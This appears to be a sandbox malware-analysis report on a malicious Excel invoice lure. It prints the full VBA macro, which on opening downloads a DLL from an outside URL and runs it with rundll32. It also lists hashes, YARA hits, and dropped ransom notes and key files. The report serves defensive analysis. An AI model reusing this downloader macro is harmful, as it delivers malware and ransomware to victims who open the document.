ed58323b...8657 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Downloader
Threat Names:
Mal/HTMLGen-A
Filename C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Category Sample File
Type Unknown
Severity Malicious
Mime Type application/vnd.ms-excel.sheet.macroEnabled.12
File Size 76.29 KB
MD5 69450923d812f3696e8280508b636955
SHA1 1f128c49a02483d6db545c166b192648a03ea6b5
SHA256 ed58323b71a87a44ff98fbb2e30c89ef7f3439f0fcb61b4d1cf32d880b088657
SSDeep 1536:zZCsGB+7ViGwWlw8LDY9O8i373ofoD9ybPtwvg0Cd35AsAl0GRwdxBP2r3EDXPV+:zZCsGKVtwWlw8LU9O8i373++9Mtw40E6
ImpHash None
Office Information
Create Time 2019-06-15 17:41:26+00:00
Modify Time 2020-01-09 12:53:50+00:00
Document Information
Application Microsoft Excel
App Version 16.0300
Document Security NONE
Titles Of Parts 'Service Invoice'!Print_Area, Service Invoice
ContentTypeId ['0x01010079F111ED35F8CC479449609E8A0923A6']
ScaleCrop False
SharedDoc False
VBA Macros (3)
Macro #1: Module1
Attribute VB_Name = "Module1"
Sub Execute()

    Dim wsh As Object
    Set wsh = VBA.CreateObject("WScript.Shell")
    Dim waitOnReturn As Boolean: waitOnReturn = False
    Dim windowStyle As Integer: windowStyle = 1

    wsh.Run "rundll32.exe Afrodita.dll,Sura", windowStyle, waitOnReturn

End Sub
Macro #2: Module2
Attribute VB_Name = "Module2"
Sub RemoveBanner()
Attribute RemoveBanner.VB_ProcData.VB_Invoke_Func = " \n14"
'
' RemoveBanner Macro
'

'
    ActiveSheet.Shapes.Range(Array("Picture 2")).Select
    Selection.Delete
End Sub
Macro #3: ThisWorkbook
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Call RemoveBanner
    
    Dim myURL As String
    Dim appdata As String
    Dim wstring As String
    
    myURL = "http://riskpartner.hr/wp-content/notnice.jpg"
    appdata = CStr(Environ("USERPROFILE") & "\Application Data")
    wstring = "Afrodita.dll"


    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    WinHttpReq.Open "GET", myURL, False, "username", "password"
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile wstring, 2 ' 1 = no overwrite, 2 = overwrite
        oStream.Close
    End If

    Call Execute
    
End Sub
YARA Matches (3)
Rule Name | Rule Description | Classification | Score
VBA_Execution_Commands | VBA macro may execute files or system commands | - | 3/5
VBA_Create_File | VBA macro contains file creation commands; possible dropper | - | 3/5
VBA_Download_Commands | VBA macro may attempt to download external content; possible dropper | - | 3/5
Embedded URLs (1)
URL | First Seen | Categories | Threat Names | Reputation Status | WHOIS Data
http://riskpartner.hr/wp-content/notnice.jpg | - | malware | - | Blacklisted | Not Queried
Filename c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat
Category Modified File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 256.00 KB
MD5 8ed682d01fa076cced515bf6b21ba022
SHA1 e69667b35d101d9cd052697da198c40a88e16e74
SHA256 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c
SSDeep 384:p8JEJHPiHzw9qthimENkKHK0M/kWJAm0yvCUW0TT0nufeuP6DYAfIc1FAPEOyAa2:pTHPUpI2djFQ7JNAocaKTbUZUzx3S
ImpHash None
Filename main-public.key
Category Dropped File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 292 Bytes
MD5 91b9ebb915a478a36e110b130f930c6b
SHA1 f381a5408ec2baf57cdc1d1388868c0edea8ab6e
SHA256 0309f713e59048664d739d8c913d44a88522d193a196bec4ed20db45412d003d
SSDeep 6:sLTWdgfDMyUIhe4ftJ/jZMvY3bVU1r9ZgKhVYogrZfwW7:udDMR4ffNMgrVOpZgQ3gdfh
ImpHash None
Filename client-public.key
Category Dropped File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 292 Bytes
MD5 708453bc940aaee8ccbee516c43b9961
SHA1 9ce03aea69e728445e6e21640c29617fbff2c1df
SHA256 f61bc6ab9e07392815d03105f409c7a03bee2c8879a91ea9e4d9d1bd13653a47
SSDeep 6:sLTfu6DvrFddLTm+zCmldhlytE9naYmCJtdLddrcUP0:uLu6DlbzTl/AtEMY7jc
ImpHash None
Filename client-encrypted-private.key
Category Dropped File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 1.19 KB
MD5 5d55172d3a76ad777ad1197d43e6dc67
SHA1 5ecc3250f50ee9edaf742620b5c14878cdf98e1b
SHA256 915ddd621024497f820c4d1c3bfe12f0d321668fe91c8289c03cb3aee25680c7
SSDeep 24:uWuYlnT1AKMl2R9x2r1m2YUwI7GEKux+sTHfYh1IUWCy4:JlT1Jx2xSv0Kux+sTHfYfInCy4
ImpHash None
Filename client-encrypted-private.key (second file with the same name, different content)
Category Dropped File
Type Stream
Severity Unknown
Mime Type application/octet-stream
File Size 1.70 KB
MD5 885bcb1645597ab3850e859acd8b29e8
SHA1 af8be73836183e6d75f1476b7f9109eee1a58d38
SHA256 1b7b39ea4494fc5490f9b20c887875556a68ea2351e27fdcb15488685f7137e3
SSDeep 48:4x9nSPP0yljEEUnb7CgibZLKtZ8cRjh86G2FjZE4:0eHjEEQpSLKZRjh892pe4
ImpHash None
Filename C:\Users\aETAdzjz\Music\\__README_RECOVERY_.txt
Category Dropped File
Type Stream
Severity Unknown
Also Known As
C:\Users\aETAdzjz\Documents\7Szrc KGP_Uqu4\s7-eygci4\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Music\bPVNxpM\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Documents\\__README_RECOVERY_.txt (Dropped File)
c:\users\aetadzjz\appdata\local\virtualstore\__readme_recovery_.txt (Dropped File)
C:\Users\Public\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\QxC2SVht\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Favorites\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Music\\__README_RECOVERY_.txt (Dropped File)
C:\Users\Public\Pictures\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\QxC2SVht\lgC1uEyqtWk70\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\7Szrc KGP_Uqu4\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\OneNote Notebooks\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\My Shapes\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Desktop\\__README_RECOVERY_.txt (Dropped File)
C:\Users\aETAdzjz\Documents\tUnbSvuPZT_E\\__README_RECOVERY_.txt (Dropped File)
Mime Type application/octet-stream
File Size 6.84 KB
MD5 28cc3f3e5bba0192515111f2eb003383
SHA1 b6b761eaa1ca867affddb0ae3354c64fc961a5ce
SHA256 8e986cbc4513ffa5249f609138114c2c172d210623b622dfd70f3b9dbed33389
SSDeep 96:h6L2QcEjp3sFVh9/VvqA9EF7hA9oRDFtho:h6LfL47eWeDFtO
ImpHash None
Filename C:\Users\aETAdzjz\AppData\Local\Temp\_uninsep.bat
Category Dropped File
Type Batch
Severity Unknown
Mime Type application/x-bat
File Size 208 Bytes
MD5 483a96f25a37a60eba1e1ff3ee418c51
SHA1 79eb26525b274ab1d7e882864d1620bd1d1776aa
SHA256 509ae7fe892c68ab1fcdaa42a22bbf2f16d29b3ed95ef3ea2096c043598c8489
SSDeep 6:mRoio/ek+TiU/ek+tdWI/go2Fo/zpJ23fCG:mRoJ+TB+tYNlCMaG
ImpHash None
Filename C:\Users\aETAdzjz\Desktop\Afrodita.dll
Category Downloaded File
Type Binary
Severity Unknown
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\notnice[1].jpg (Downloaded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 258.00 KB
MD5 d4b946b51dc21709f87a1a943ad7cbe3
SHA1 8c2a1c67493eff3990ab30862e094c34e6821eea
SHA256 9b6681103545432cd1373492297a6a12528f327d14a7416c2b71cfdcbdafc90b
SSDeep 6144:EXrm0zIiAhjC7Cqa5ZhiIJDQ13Xdksm1Cx2tJk:EbNQaCq6iIJcdksmJtJ
ImpHash None
Filename vbaProject.bin
Category Embedded File
Type Unknown
Severity Unknown
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type application/CDFV2
File Size 17.50 KB
MD5 307513404dcdd22ff85bf599a9138e8f
SHA1 8e3556dc5ce2b3d3361aebac3dc2730aacb33d2c
SHA256 320210c50a3fcdea7603cef1a6b35b11b884b4c1a726ec0c3ca33d283759813d
SSDeep 192:saEyP3eFBWPY7HskvL+7byaFEShbel3xCGMi5MFax:lElBYKHrLEzFESl43xCGMi5
ImpHash None
Filename workbook.xml
Category Embedded File
Type Text
Severity Unknown
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type text/xml
File Size 1.72 KB
MD5 abcc080fa751d1982107b275ceacd1d0
SHA1 fbf312b6b03ee2e6a5a647aac9048ee494d28a6a
SHA256 8221830b81cba389c3dd7cfd252daad1fa9c14069f32d07cf8fbc81f1e73552a
SSDeep 48:cV5hmNYZK1BrPBKvBXBZB/niC4tGE+HL60tNIlBuQvX:wXmmZYBrPBsBXBZBmGEFBuQv
ImpHash None
Filename sheet1.xml
Category Embedded File
Type Text
Severity Unknown
Parent File C:\Users\aETAdzjz\Desktop\Ponuda-2020-0231.xlsm
Mime Type text/xml
File Size 12.41 KB
MD5 92a7d1ef5dc788cc054d46f9b979e15d
SHA1 4fcc83ac342c27e95d5c47c6054357706a1375c4
SHA256 cc2defc1f4e8b1dd73ddc00da16b40d7f1176b259c4215c2470ccb283ee478e4
SSDeep 192:YXmmZe5mQMuDKpBb9VtodMo8G985RVeF16Pqx8xCcK8pW3vr4aN4yFcF8D:YXmue5mQB+pBb1XGmahNOW
ImpHash None